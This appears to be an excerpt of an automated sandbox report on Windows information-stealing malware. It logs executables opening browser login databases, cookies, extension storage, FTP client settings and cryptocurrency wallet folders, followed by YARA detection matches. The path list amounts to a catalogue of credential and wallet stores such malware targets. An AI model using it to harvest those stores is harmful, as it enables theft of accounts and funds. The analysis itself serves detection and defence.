Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\ATJBEMHSSB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BWETZDQDIB
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\BXAJUJAOEO
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\HQJBRDYKDE
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\MIVTQDBATG
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: C:\Users\user\Documents\SNIPGPPREP
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Directory queried: number of queries: 1420
Source: Yara match File source: 0.3.file.exe.11f72e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.11f72e0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000003.2084529738.0000000001193000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2068205912.0000000001190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2043212378.0000000001190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1459148229.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2082564120.0000000001191000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1477555129.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1446807409.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1431421560.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1474200360.00000000011F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8138ba21a1.exe PID: 2276, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: 136916b3ff.exe PID: 5936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 7412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8138ba21a1.exe PID: 2276, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 38.2.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.bd214fbd32.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.bd214fbd32.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.0.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.J2IWSCR5FJAMGGW2VC4ET4.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000003.2232897578.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2122542040.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2204680334.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1985396722.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2323652564.0000000000291000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.2029327781.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1883606041.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1600676886.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2207625905.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1688670034.0000000000471000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1690398993.000000000111E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.2182412308.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1987795463.000000000112E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1927559885.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.1970036309.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1923946896.0000000000051000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2116759682.0000000000051000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: J2IWSCR5FJAMGGW2VC4ET4.exe PID: 7932, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bd214fbd32.exe PID: 4864, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP